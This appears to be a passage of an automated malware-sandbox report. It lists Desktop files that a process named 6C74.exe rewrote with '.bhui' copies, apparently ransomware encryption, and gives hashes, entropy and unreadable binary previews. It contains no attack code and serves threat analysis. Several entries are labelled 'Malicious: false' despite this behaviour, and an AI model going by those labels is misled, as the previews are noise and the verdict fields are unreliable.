SSDEEP:	24:yOJ5BSAdfJBaIeXjjaOyoOyjUznnBV7kMH7dWssVvn09K4kspD90nFkbuWbD:95BSAdhBaIeX/vAnBV7FbmVlopkFOD
MD5:	D201A96D887811F081F64B62D9C5AF86
SHA1:	1D959867AA8B54F3EFD899AC8E37E6F3CD4444F1
SHA-256:	46A2F85D3732C5FA980572304EF7728C4E769E5D41B7A19D41C34DEBBF4D2C15
SHA-512:	7CDDB4EBD6C7A3D26198631FAA370B9B070ABEE09C43C4781C2DD58D512560AB08EFDD0DB8269162A34D32735CF0F169A06BE124F216259CD42C7C194D4C6E5D
Malicious:	false
Reputation:	unknown
Preview:	QCOIL.Z...............WJ.../.Q.i...'..._^V.8g3U.%..N.../....D.I....[g..../...6K.ienc.......wB..ogVgqI.....o.F.......M.g_^......%JI....y.m...'.X........a..p....U_..D....8y....w.%H....l.1x...if....u.Bl..)...8.%......H.#.F5..-...g....*..5..EYBr..}eJ..[.pQ.0;oS...O;[....G..{&..rC.U@s.....4G<..Jh@..Lb..!..P.m.Xn.#...5d.p.\.[L..G9._.VI.V./..I..u........\|J.k..%....$mbIY'.......a..o..u..P=A...B.B._.%J..\|........x..pn.....M..83.....,.%..:7./....c..$O).O...}...I\....{..HE.k...5.F....GDI..kt...c.K.].3"...~.Y.Fv.....2<.q..'to.>..:..r....lU...y...`d......FO).[.Dh..tI.....Nf._~G.6P....D.\.V.W..Y?1e..e.LK.e..../..u'.o.x/...9C5Sw.P...Mj'n/.5[,.~Z..$......."1..z.e..b.k.i.N...P..NY..g..;n.......F .G..m.M...%(....yq!{.<.o..G.-`mA...d]b..`/4.j.......Oz.q.Yf.q[ 1.K...xY.F..s..H.](.O..d..#...C...`.J.g......u84..Ke..!..W..+..s..5..Cn.....]..(U...:....yC..]......l...4......oV...hC.8....B<}[.e....EVS..z..."..BJ.JB.....g.^7./B;..i.}.......b2...

C:\Users\user\Desktop\QCOILOQIKC\CZQKSDDMWR.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856285221039531
Encrypted:	false
SSDEEP:	24:COFP+dOd/BVVfye8zp6AA1RxdD5q0wNRqVoHiA7XuhtWbD:lPw0lNyS1R5HsjDXBD
MD5:	D20B89B2CB02AD658956F537734CD220
SHA1:	C7197220DEEA3999B43648559058CF020A8AAC34
SHA-256:	1DB055C812BEB30C3E0913DCC32800526159110751731A47E8A37F39AB32D2DF
SHA-512:	5FA5CDF340D4CB64558CA2B644CA6B94E95270884710E622D9C4538705A02D233E6718F1F5A6C7F6B39B0AED8E3AF2EC9B0B88B9AE75B7D11773F3AFF42B9B7B
Malicious:	false
Reputation:	unknown
Preview:	CZQKSv..A...D..!...cg.o.E..BG..$H0..l.E.=.. ..R...."....v2..jg=....Z........%J..p.1....OQ4..G...7..J ..<.HUo=EM...\.].'..B......#.....rNZ.k.......n........LU$...._X....V....<.......m.H..h..6.H .."$...g.<a..QDb9.._Dz..N...>.Z.SV...e....u.od{..f\....R;...fC.}?F{.<.v..?]....\....+..Ns...a.../..r.D#........^l0.\|.....<h$.7{.3l.......cr.....>.{.ZN....z.f..<./..t.Z.k6..j.l.Cf...Fq.:.i....h.}..j0f...Sjz.i\|yT.T....+.P.e..'",9BPX`D......cp.}=%7..O....!k......@r.....V...Q7.....B.W.8M.........).sz.k......].f6..._...r.+Pw7.7...d......N'6p...(.b..^...8....R..4!.mJ...0...>.~....d.m.6_q..b.....A...l..Oi..J....G.....W.3...{..._v..D....!HC.o.XY.c.#.)..W[N.#..A.....C......n.....v[Dk\\..].T7u.\|...KBjg.qr..d...35.S.t...:(....wg..k..E.+....h}..3R..\|Y(..........:...^....1m..O..hA{i...u.+.p.....1......[......i....V..Q7*'..a...5..r.o......,.L....U0&..H....!.j...4.X..ap.?..wuX...N..H.9.+.....v.~J.......PTs-.7..\|.....@...[}U...M{..T.IK.N.[..Uz3.P.....\.2Yr

C:\Users\user\Desktop\QCOILOQIKC\CZQKSDDMWR.png.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856285221039531
Encrypted:	false
SSDEEP:	24:COFP+dOd/BVVfye8zp6AA1RxdD5q0wNRqVoHiA7XuhtWbD:lPw0lNyS1R5HsjDXBD
MD5:	D20B89B2CB02AD658956F537734CD220
SHA1:	C7197220DEEA3999B43648559058CF020A8AAC34
SHA-256:	1DB055C812BEB30C3E0913DCC32800526159110751731A47E8A37F39AB32D2DF
SHA-512:	5FA5CDF340D4CB64558CA2B644CA6B94E95270884710E622D9C4538705A02D233E6718F1F5A6C7F6B39B0AED8E3AF2EC9B0B88B9AE75B7D11773F3AFF42B9B7B
Malicious:	false
Reputation:	unknown
Preview:	CZQKSv..A...D..!...cg.o.E..BG..$H0..l.E.=.. ..R...."....v2..jg=....Z........%J..p.1....OQ4..G...7..J ..<.HUo=EM...\.].'..B......#.....rNZ.k.......n........LU$...._X....V....<.......m.H..h..6.H .."$...g.<a..QDb9.._Dz..N...>.Z.SV...e....u.od{..f\....R;...fC.}?F{.<.v..?]....\....+..Ns...a.../..r.D#........^l0.\|.....<h$.7{.3l.......cr.....>.{.ZN....z.f..<./..t.Z.k6..j.l.Cf...Fq.:.i....h.}..j0f...Sjz.i\|yT.T....+.P.e..'",9BPX`D......cp.}=%7..O....!k......@r.....V...Q7.....B.W.8M.........).sz.k......].f6..._...r.+Pw7.7...d......N'6p...(.b..^...8....R..4!.mJ...0...>.~....d.m.6_q..b.....A...l..Oi..J....G.....W.3...{..._v..D....!HC.o.XY.c.#.)..W[N.#..A.....C......n.....v[Dk\\..].T7u.\|...KBjg.qr..d...35.S.t...:(....wg..k..E.+....h}..3R..\|Y(..........:...^....1m..O..hA{i...u.+.p.....1......[......i....V..Q7*'..a...5..r.o......,.L....U0&..H....!.j...4.X..ap.?..wuX...N..H.9.+.....v.~J.......PTs-.7..\|.....@...[}U...M{..T.IK.N.[..Uz3.P.....\.2Yr

C:\Users\user\Desktop\QCOILOQIKC\GLTYDMDUST.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85581501245228
Encrypted:	false
SSDEEP:	24:6WwG470e4BcbVtIfH6Sqhf9MXXo/MY7l8/ozB9H/J7TWrcrasM3jQfSClu70SiEA:6WXmxbrjpKXXoyojJfWrcrabjQfXYiEA
MD5:	C724482BBAECE1EEE3DEF249363B9938
SHA1:	31E765E3D1EE495B651E48FB3DB907F1B6244BC0
SHA-256:	AB5453F92D8A7633F9281ADEDF879D7B7134857FD01EEC6F657A95C230BDB0DA
SHA-512:	062A03498715D5AAF86DF3B85888926FA91789504DBF0C9A094E69F8ACDB927561D79798D8C4217D86B5778F4D42E4D61614A7A59D821859470AA607280C06C3
Malicious:	false
Reputation:	unknown
Preview:	GLTYDX.n-...K..I...Wc'}]....T.{.\.....P..P.".{hx...j,....3#..E....._...Q..d@.....N.....7..@V.'H....a.j..mv"~]..s........A~a...F.k.H*.i...0..F..K&D....^..8.4\|..;..].W]B..3.8ap;.`.v...tJ7.t....E.....E.....-k....p.@.o.e.[A~h#.g?. 4w...-.W.T.7+..).c-...(....Ht..4.:...4..w^.":UE.UoZA..(.l.....sRBz.T...6..Nc>L..!..7fu-z...V.........=...<.M.....-....O..%g9?....s..j9..q=...y<.e7!....y.=..T..o.#.!.....A.$...v\\?.v.!..Yy.s?.jc..Yik.&........./..... W.....BI3.P..e&...t...v....Tm...}..o..A8.E...d(...EQ8......k.x.9}J.m...)...j)....1..l.2(...<!.q..}..h.1k.".~....l.._:.g..>.c......$T@[t.....>....G.;..5.bn>-....F...`C... .g..1...R..l...+.Aa.....q...8b..R.`...a....7....M.........:./.e..@i...z..-.I.6S...6./Yu.W.T.o.E...-.vK>e....x...gv......j.'5/. ....)....76g.qO..n..".{6n4...9r).K...n.P2...'3M.G.Lw0.../.^.0e..J.....{......).....S..Z.F..j....7../a...[.../..UqD2d..x..K..H..c.Vh.=....W..L...>.(........{.....l.......?.< ......J.)..F..K.z..yt...}.A.........+X...

C:\Users\user\Desktop\QCOILOQIKC\GLTYDMDUST.mp3.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85581501245228
Encrypted:	false
SSDEEP:	24:6WwG470e4BcbVtIfH6Sqhf9MXXo/MY7l8/ozB9H/J7TWrcrasM3jQfSClu70SiEA:6WXmxbrjpKXXoyojJfWrcrabjQfXYiEA
MD5:	C724482BBAECE1EEE3DEF249363B9938
SHA1:	31E765E3D1EE495B651E48FB3DB907F1B6244BC0
SHA-256:	AB5453F92D8A7633F9281ADEDF879D7B7134857FD01EEC6F657A95C230BDB0DA
SHA-512:	062A03498715D5AAF86DF3B85888926FA91789504DBF0C9A094E69F8ACDB927561D79798D8C4217D86B5778F4D42E4D61614A7A59D821859470AA607280C06C3
Malicious:	false
Reputation:	unknown
Preview:	GLTYDX.n-...K..I...Wc'}]....T.{.\.....P..P.".{hx...j,....3#..E....._...Q..d@.....N.....7..@V.'H....a.j..mv"~]..s........A~a...F.k.H*.i...0..F..K&D....^..8.4\|..;..].W]B..3.8ap;.`.v...tJ7.t....E.....E.....-k....p.@.o.e.[A~h#.g?. 4w...-.W.T.7+..).c-...(....Ht..4.:...4..w^.":UE.UoZA..(.l.....sRBz.T...6..Nc>L..!..7fu-z...V.........=...<.M.....-....O..%g9?....s..j9..q=...y<.e7!....y.=..T..o.#.!.....A.$...v\\?.v.!..Yy.s?.jc..Yik.&........./..... W.....BI3.P..e&...t...v....Tm...}..o..A8.E...d(...EQ8......k.x.9}J.m...)...j)....1..l.2(...<!.q..}..h.1k.".~....l.._:.g..>.c......$T@[t.....>....G.;..5.bn>-....F...`C... .g..1...R..l...+.Aa.....q...8b..R.`...a....7....M.........:./.e..@i...z..-.I.6S...6./Yu.W.T.o.E...-.vK>e....x...gv......j.'5/. ....)....76g.qO..n..".{6n4...9r).K...n.P2...'3M.G.Lw0.../.^.0e..J.....{......).....S..Z.F..j....7../a...[.../..UqD2d..x..K..H..c.Vh.=....W..L...>.(........{.....l.......?.< ......J.)..F..K.z..yt...}.A.........+X...

C:\Users\user\Desktop\QCOILOQIKC\NWCXBPIUYI.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.864756121461902
Encrypted:	false
SSDEEP:	24:Auqu7Ql3Pdu7svcnU48BS6s34ek7nvrcZoaJiHQxPMCGOWbD:ADiQBU7Rn5UaGnvrcipHQiCG7D
MD5:	B9115F3A035CACC57F00D86EB8B35A99
SHA1:	2D5C4FCF610369C8EC4DACB8C0A188E88733C4D7
SHA-256:	FB0C19588174E743A970BA8E1F9F178008603DCF4791BD84CF5A471222D86B28
SHA-512:	D502553AD80A1F619F41D51C15DB6D381E49C4615496A86B5FE1658D5CDAA573EB021BE4E151C6431B2065219322E4524C42D7B0E2C06BC5E4ACBE281D821E2B
Malicious:	false
Reputation:	unknown
Preview:	NWCXB..J.!......zw.DN.V.dO.P4..UE...'..^...6.d=.Wo.....K,q.3m..[.....m......N.0G...#.'...Au.{...KQ.G..X.4....F.Lq.a4..Q.....k.o..s.?\...T.o5..$u..8>c..J..z....qR_.\|....9\|.q....C...[k.eOn..R.]ZV.....q.s.JAZq.u........gP...k.e7...+.........`n...P..9J..eR..G....O..~1.P.^..(.<XA.j]..vA.l.yx..C3...u.i...'.o.E3._h...8..<+.]..TBg........i...$...E/.i.{JB..7.Li.N.]H.m,..n.f.Y.a. .xb...PKO...o_O...aNY.Q.+.g....W`fgJ.J.......^.....I.....bJ.c...G.(.p..`....).s..EI..y9.5.....x..".:%I...B.......>.K&a!.3..%.k..q.5!&....}k....3P...WQ.-1..4..6.....Q.;..&.!uj#.....6..#..7.5.n.d.?.%....).)A..S(%(..j...YS....WN.L...o}..Y..&_.Q...E..N....V...B..;u.J..OOwvPr.LJ....%%.\|.3...o$..<i....By?...l._l...F&.....2 .y.v.GC...i*.x...v..U!O...L...4.....d".....amJ.8....264..E\B...."/.... ._...u...By....8..{~1O..=D&....>h7./}b.)...[.. ....+...p.d0.'.d...Q......}#...$.c2...v.k.x.G..+..ND?..n......c. -...y~iMg.......`.....O.[.2..W...6...So.M^]7Z...9....F.jT.....P..>'..

C:\Users\user\Desktop\QCOILOQIKC\NWCXBPIUYI.jpg.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.864756121461902
Encrypted:	false
SSDEEP:	24:Auqu7Ql3Pdu7svcnU48BS6s34ek7nvrcZoaJiHQxPMCGOWbD:ADiQBU7Rn5UaGnvrcipHQiCG7D
MD5:	B9115F3A035CACC57F00D86EB8B35A99
SHA1:	2D5C4FCF610369C8EC4DACB8C0A188E88733C4D7
SHA-256:	FB0C19588174E743A970BA8E1F9F178008603DCF4791BD84CF5A471222D86B28
SHA-512:	D502553AD80A1F619F41D51C15DB6D381E49C4615496A86B5FE1658D5CDAA573EB021BE4E151C6431B2065219322E4524C42D7B0E2C06BC5E4ACBE281D821E2B
Malicious:	false
Reputation:	unknown
Preview:	NWCXB..J.!......zw.DN.V.dO.P4..UE...'..^...6.d=.Wo.....K,q.3m..[.....m......N.0G...#.'...Au.{...KQ.G..X.4....F.Lq.a4..Q.....k.o..s.?\...T.o5..$u..8>c..J..z....qR_.\|....9\|.q....C...[k.eOn..R.]ZV.....q.s.JAZq.u........gP...k.e7...+.........`n...P..9J..eR..G....O..~1.P.^..(.<XA.j]..vA.l.yx..C3...u.i...'.o.E3._h...8..<+.]..TBg........i...$...E/.i.{JB..7.Li.N.]H.m,..n.f.Y.a. .xb...PKO...o_O...aNY.Q.+.g....W`fgJ.J.......^.....I.....bJ.c...G.(.p..`....).s..EI..y9.5.....x..".:%I...B.......>.K&a!.3..%.k..q.5!&....}k....3P...WQ.-1..4..6.....Q.;..&.!uj#.....6..#..7.5.n.d.?.%....).)A..S(%(..j...YS....WN.L...o}..Y..&_.Q...E..N....V...B..;u.J..OOwvPr.LJ....%%.\|.3...o$..<i....By?...l._l...F&.....2 .y.v.GC...i*.x...v..U!O...L...4.....d".....amJ.8....264..E\B...."/.... ._...u...By....8..{~1O..=D&....>h7./}b.)...[.. ....+...p.d0.'.d...Q......}#...$.c2...v.k.x.G..+..ND?..n......c. -...y~iMg.......`.....O.[.2..W...6...So.M^]7Z...9....F.jT.....P..>'..

C:\Users\user\Desktop\QCOILOQIKC\NYMMPCEIMA.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.836235598328798
Encrypted:	false
SSDEEP:	24:gxQij7i4Bba/A8nflsap0SFx1IP7bE45VxGTEi5qMGGT/xchrV8vgr0U4S/WbD:gxbHI/A2NsaaU/IP7tVAYMG4W5V8vE05
MD5:	BA52B234B6595C681F358F690AAFDA6B
SHA1:	ED79B9BD1F6A55C86CDCE44455BCC4957C2E06F1
SHA-256:	B363736C932F400CE0CDE55B5513A11E1652C3562807B8980C2C282D5AD36E95
SHA-512:	19185BFF2B5C1B38B87C07B8042C5030DF8FB7255B62EA0FAD21698C3D57B6D760F953C6F1336AE91D4CC2C7D34ADB056F49FC665A5ACED75701FA859577EC80
Malicious:	false
Reputation:	unknown
Preview:	NYMMP1.e~7...m{A.o.m........o<...6..Thi~...E......s.....r8...SH7..k....L...\|-H0..^..z5..Bq4c,..5!N...".$....<\|.7....+..0.d.C.9...h....C.......;...6_}y..^.Gm...RJ..{<..9...U.!"3.....W..QU.d.!.......\1..Zq.HXB..@..V.[y.xb....n.l\.M..s.0P...)...R......4.)w...8b.....D.4O...\...e.....o..:'.....nz.z...m....>.....=.......@u9.3.:...U.[.'.c...#..T...b.\..c...........,^.vk@.....Ee1.<.X.z./.......81.y.,.;n6..\.j..yD.1)!..%mx....z]8.I..J...m.g.l.}...f.(V...&z.V.'......!.....B.W!;3..FB../...\..6AoQg.~.b..d...(..4.N]H.7.</ .3:..N.A......}...3.S.[1.g........%.....w"...S.....E.....+.@...Bq...p......t...O..kY.p.....D.<.V.K...7.V..s.'.$...kIby.>V...-y..8...r......1n...9..T.....E!.L..q`3.;....`...].Y.....U.~H_q.\|.K(]..p......yT..O.X].E..)..m..0k.f...BX..B.^w....&O.>...=W.rp..k...}......mMM.D..\|...AL..xp.I.....`...SD.-....a....C4t.:.....W'..........G_..H.M......%.......~.G..;.F:){.,...".I~.....>....m.....n.I..H....bMk.k..1.+[9.@.]...+X..

C:\Users\user\Desktop\QCOILOQIKC\NYMMPCEIMA.xlsx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.836235598328798
Encrypted:	false
SSDEEP:	24:gxQij7i4Bba/A8nflsap0SFx1IP7bE45VxGTEi5qMGGT/xchrV8vgr0U4S/WbD:gxbHI/A2NsaaU/IP7tVAYMG4W5V8vE05
MD5:	BA52B234B6595C681F358F690AAFDA6B
SHA1:	ED79B9BD1F6A55C86CDCE44455BCC4957C2E06F1
SHA-256:	B363736C932F400CE0CDE55B5513A11E1652C3562807B8980C2C282D5AD36E95
SHA-512:	19185BFF2B5C1B38B87C07B8042C5030DF8FB7255B62EA0FAD21698C3D57B6D760F953C6F1336AE91D4CC2C7D34ADB056F49FC665A5ACED75701FA859577EC80
Malicious:	false
Reputation:	unknown
Preview:	NYMMP1.e~7...m{A.o.m........o<...6..Thi~...E......s.....r8...SH7..k....L...\|-H0..^..z5..Bq4c,..5!N...".$....<\|.7....+..0.d.C.9...h....C.......;...6_}y..^.Gm...RJ..{<..9...U.!"3.....W..QU.d.!.......\1..Zq.HXB..@..V.[y.xb....n.l\.M..s.0P...)...R......4.)w...8b.....D.4O...\...e.....o..:'.....nz.z...m....>.....=.......@u9.3.:...U.[.'.c...#..T...b.\..c...........,^.vk@.....Ee1.<.X.z./.......81.y.,.;n6..\.j..yD.1)!..%mx....z]8.I..J...m.g.l.}...f.(V...&z.V.'......!.....B.W!;3..FB../...\..6AoQg.~.b..d...(..4.N]H.7.</ .3:..N.A......}...3.S.[1.g........%.....w"...S.....E.....+.@...Bq...p......t...O..kY.p.....D.<.V.K...7.V..s.'.$...kIby.>V...-y..8...r......1n...9..T.....E!.L..q`3.;....`...].Y.....U.~H_q.\|.K(]..p......yT..O.X].E..)..m..0k.f...BX..B.^w....&O.>...=W.rp..k...}......mMM.D..\|...AL..xp.I.....`...SD.-....a....C4t.:.....W'..........G_..H.M......%.......~.G..;.F:){.,...".I~.....>....m.....n.I..H....bMk.k..1.+[9.@.]...+X..

C:\Users\user\Desktop\QCOILOQIKC\QCOILOQIKC.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85079662460846
Encrypted:	false
SSDEEP:	24:lDzZ/VBlMpThisa7vgSNUyEIuwGjDTiweAGisiw3gHOWbD:lDznroMsazx73+XuweAGCFH7D
MD5:	0F76FFE486AF21363242D4CB060B3709
SHA1:	B8164C9508DB6240CC647DFDDE028EDF869A97E1
SHA-256:	AA64EB5BD119718CA9E395BB5038BCDEEDDCD0991148F4FB67F330EDE8519FF8
SHA-512:	ABD9F7E5637F58C9219AEA284016BE525701A3E44ED4E8566AF265CFF5EB085AFA1009858B3A45020B9F2D20F3676E37849D958EFE50E8285683FCF2C25FC586
Malicious:	false
Reputation:	unknown
Preview:	QCOIL...x&.O..Msg..)UGo....S?%e".#.@3...u.....I.......\V...xw....E..=... ..,.,.\..h...J&k.Y...O.)J.......!...vg..SHd.#..B+.........>K.ks$~.J."...T.I.G....lc%qX.sp..c....e2.Z.o.q...\|....1...;..I....V`..28z.......a..D...p.....l..)Q...:.).7v..'...e0.......S4.6...UKL..v.,..].#.......]gk.#........^...).;.$.oD"..l+..L....'..&@".;..P.]j.~R(4.N....e......lS.)...k.E.....J.M....h.3Cw.K..M......\'./.IZ.gq...>..6}.C@l...h.KO.BY..q.D....0....g..[.>i..;..Tzpy5.kM.'.......'..4...._n..~.8....!......_\|....r.d..Y.....<O%..%'sj..I.$.%....n<..hH.C..b.0.q..;G....,..Un........!..X".YX..okv..\|..b%.4n\|.^8"..8...5.e......S..?....@.F.w...........i".GD.t.C.u...#...U..z..2.j..:u.;.Ek.....(A.u.Y.5]B.B.uW...c5....}a.>.........E...o.p.....u.C...u.g@..s.....hzv..X.DU.LYe-lj.@.....!..4P.4.......>.`...r....4.eeA.Z..{-...}./..5.....p~p..............`...o...r1. .=v.]E.E.d.\.....O.!....a3Q...]...Y.._..[...\.....n..x....!G..9.&.-(.p..H.t..Z.Z.t.T..S,%.jjb........q@O.

C:\Users\user\Desktop\QCOILOQIKC\QCOILOQIKC.docx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85079662460846
Encrypted:	false
SSDEEP:	24:lDzZ/VBlMpThisa7vgSNUyEIuwGjDTiweAGisiw3gHOWbD:lDznroMsazx73+XuweAGCFH7D
MD5:	0F76FFE486AF21363242D4CB060B3709
SHA1:	B8164C9508DB6240CC647DFDDE028EDF869A97E1
SHA-256:	AA64EB5BD119718CA9E395BB5038BCDEEDDCD0991148F4FB67F330EDE8519FF8
SHA-512:	ABD9F7E5637F58C9219AEA284016BE525701A3E44ED4E8566AF265CFF5EB085AFA1009858B3A45020B9F2D20F3676E37849D958EFE50E8285683FCF2C25FC586
Malicious:	false
Reputation:	unknown
Preview:	QCOIL...x&.O..Msg..)UGo....S?%e".#.@3...u.....I.......\V...xw....E..=... ..,.,.\..h...J&k.Y...O.)J.......!...vg..SHd.#..B+.........>K.ks$~.J."...T.I.G....lc%qX.sp..c....e2.Z.o.q...\|....1...;..I....V`..28z.......a..D...p.....l..)Q...:.).7v..'...e0.......S4.6...UKL..v.,..].#.......]gk.#........^...).;.$.oD"..l+..L....'..&@".;..P.]j.~R(4.N....e......lS.)...k.E.....J.M....h.3Cw.K..M......\'./.IZ.gq...>..6}.C@l...h.KO.BY..q.D....0....g..[.>i..;..Tzpy5.kM.'.......'..4...._n..~.8....!......_\|....r.d..Y.....<O%..%'sj..I.$.%....n<..hH.C..b.0.q..;G....,..Un........!..X".YX..okv..\|..b%.4n\|.^8"..8...5.e......S..?....@.F.w...........i".GD.t.C.u...#...U..z..2.j..:u.;.Ek.....(A.u.Y.5]B.B.uW...c5....}a.>.........E...o.p.....u.C...u.g@..s.....hzv..X.DU.LYe-lj.@.....!..4P.4.......>.`...r....4.eeA.Z..{-...}./..5.....p~p..............`...o...r1. .=v.]E.E.d.\.....O.!....a3Q...]...Y.._..[...\.....n..x....!G..9.&.-(.p..H.t..Z.Z.t.T..S,%.jjb........q@O.

C:\Users\user\Desktop\QCOILOQIKC\ZIPXYXWIOY.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.844556007752096
Encrypted:	false
SSDEEP:	24:JW6NPFpQano8S8jrFy64/voWk4QmMHrDbSwbxXAiVLc/4eBi0tb5zOLchfkWbD:JW0PDQanoX8jrM6Evl/wDSEuiVLcc0td
MD5:	ECC03ECF32E18B3B4476C8CB301D820C
SHA1:	469CF0AFEB1574975448F6E50E90642B532F0CEA
SHA-256:	816E5E0824647196DC1C1A7E4C18D3862B7F44E6E2D79901F652AB9D094BD955
SHA-512:	6476ACCD92724DEADDFB0FDB824789A0277113D6A7A194DC76CDEA82DB85B81E8DD6156269714A1C8A2502A689FB741F088082560401085E3D10A0194A80E86C
Malicious:	false
Reputation:	unknown
Preview:	ZIPXY..:...Yu.O..yf:@..y&.:.5.e..]"2.p.k..R......KG{.^F.B.a.. .^.......]..u....."I\.kqr..SXA.2a......o.U.+utH\..}..3e$:.Q~.sfU......Hw.F.............@.4z.........@.X..$2...K%..aBfW.Sb..uq5.9G.?..[...M.+..\...D..:.......\|x...Ld..Q..'..t`.7..&z.E.].iFRk.o.gc....2<.k..u...:a..O.t.J.x.C..".Z...{..N....nY...........}Y....tf...9.e.JT....q.!.x.d.3g.J.;.....)....Wt.j=Qe...?.33v$....L..b.....Z..E..+0;...l\|....sD5.u..O.F~.jz.8....M.B{..0IQ.....j..n.....WPB..$.. .....\|.O.......'=.7i...O.@.<tz.o..W..:u.l....B.......ic9....vw{.'...hj....)...g.E.....{.P.....].....#Z.....hs.0.....J..41...~.%.u...<..`.P...])p..O....#W...Rl...t.T....OS.$.3.......r..#...l..'.6.)....B.a....[...zSlPXr...H.../.-....V`~.S.2d..._.[zw.U.R.......C....;.,.,v.8{.q.7...@x..+....u!....1O.z.....C.m....7.. s#E...m...2.V..3..~S...._G.x. .......m..0 .(...C..>..l........8........!.*..:..0..,..E.)..mB...,..8B.=.{&.....5.b...91..Bi...\|...A.Qj...8FT..@.$....p...51G52Q..+...Cu....u..

C:\Users\user\Desktop\QCOILOQIKC\ZIPXYXWIOY.pdf.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.844556007752096
Encrypted:	false
SSDEEP:	24:JW6NPFpQano8S8jrFy64/voWk4QmMHrDbSwbxXAiVLc/4eBi0tb5zOLchfkWbD:JW0PDQanoX8jrM6Evl/wDSEuiVLcc0td
MD5:	ECC03ECF32E18B3B4476C8CB301D820C
SHA1:	469CF0AFEB1574975448F6E50E90642B532F0CEA
SHA-256:	816E5E0824647196DC1C1A7E4C18D3862B7F44E6E2D79901F652AB9D094BD955
SHA-512:	6476ACCD92724DEADDFB0FDB824789A0277113D6A7A194DC76CDEA82DB85B81E8DD6156269714A1C8A2502A689FB741F088082560401085E3D10A0194A80E86C
Malicious:	false
Reputation:	unknown
Preview:	ZIPXY..:...Yu.O..yf:@..y&.:.5.e..]"2.p.k..R......KG{.^F.B.a.. .^.......]..u....."I\.kqr..SXA.2a......o.U.+utH\..}..3e$:.Q~.sfU......Hw.F.............@.4z.........@.X..$2...K%..aBfW.Sb..uq5.9G.?..[...M.+..\...D..:.......\|x...Ld..Q..'..t`.7..&z.E.].iFRk.o.gc....2<.k..u...:a..O.t.J.x.C..".Z...{..N....nY...........}Y....tf...9.e.JT....q.!.x.d.3g.J.;.....)....Wt.j=Qe...?.33v$....L..b.....Z..E..+0;...l\|....sD5.u..O.F~.jz.8....M.B{..0IQ.....j..n.....WPB..$.. .....\|.O.......'=.7i...O.@.<tz.o..W..:u.l....B.......ic9....vw{.'...hj....)...g.E.....{.P.....].....#Z.....hs.0.....J..41...~.%.u...<..`.P...])p..O....#W...Rl...t.T....OS.$.3.......r..#...l..'.6.)....B.a....[...zSlPXr...H.../.-....V`~.S.2d..._.[zw.U.R.......C....;.,.,v.8{.q.7...@x..+....u!....1O.z.....C.m....7.. s#E...m...2.V..3..~S...._G.x. .......m..0 .(...C..>..l........8........!.*..:..0..,..E.)..mB...,..8B.=.{&.....5.b...91..Bi...\|...A.Qj...8FT..@.$....p...51G52Q..+...Cu....u..

C:\Users\user\Desktop\SNIPGPPREP.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.86680842186028
Encrypted:	false
SSDEEP:	24:CuY/4rZb2ZKqkX1VNRYUq+jTwODX9Gd0OabQ1F6zfKf4zay0/3Wf4mceAWbD:XYoF2Uqen5q+hL94abQz6zyftCce1D
MD5:	A7D7501FB945BA25FB0F00120A8EA810
SHA1:	E5BE9C34106E212B5DA84688C4A7398BAA81099D
SHA-256:	A610B7DBB11F5A6C74015852B77F4CEAC5C8D2FBA753F898DE5EBE55E334B8C4
SHA-512:	2DB18A1A272433718D5CF3E8E6A11E5BC13010A1AF0245E40E31ADDC997C4E1FE697A6FD8E9263CAD659FED17271F812829B9B0935B77AD18593ABBE4311A0DA
Malicious:	false
Reputation:	unknown
Preview:	SNIPGW]W.(.S..p.....L......J\).b.....]y-.5..f[C.`..H...7.A...k...."....f.1.=..(zx.[D..../...Tx.../?.....y@ ..d...M..p.Z..r.Us..#..n........R.....d./..^we2...i.).......b...#f>.@.f....m.l..6rK6P&....=.i..w"R3\?.>.B......#..;..X.u;......;...mJ.`:s8..}O.q&......^..........n.i.)....}.F....:.m%..q....Uf.\|.....#..^...%.8{[.^..LT%.F..)b!.+..Gr...s2.W.%..NY....[sH.M......=..l.1e..Jz...U..M..K...,.......UJ9.~...1C....V..s.r&z..)yC.IjY....p.8.mp.......H.F@....b..k..;.M.[...%..k.....".sU.8e.;...a.-.&....._....m..D..1,.....l..G..Q>..W.......6.H.BhV.QW.{a..J18...BVT../U.N.....b..7I..h:.m..vGu....X....../..l.f.q<.m...o.w...na.a..0'tk...t8.7M.R..[r.U.S...M....GBu..Y..8n...(../t...B..w.....\|8H.E..u...?>.l._.7.}..T.HM..}}h.-..._..E...Bgc.r-.(..2!k5T+.&W..:.(.......=~Gw&.S...S.f>F.iz....d^..&].1..._.....P.\|..&q.-..q..q.\|.l.B..v.{H<...O....O.5....'...d....e. 8...PX...Q{.....6...6...wH..K.W....iI.w.."...d...F....j.x#.V..5y....g..M.e.$?..z.)(.,g...p...U./x..

C:\Users\user\Desktop\SNIPGPPREP.png.bhui (copy)

Download File

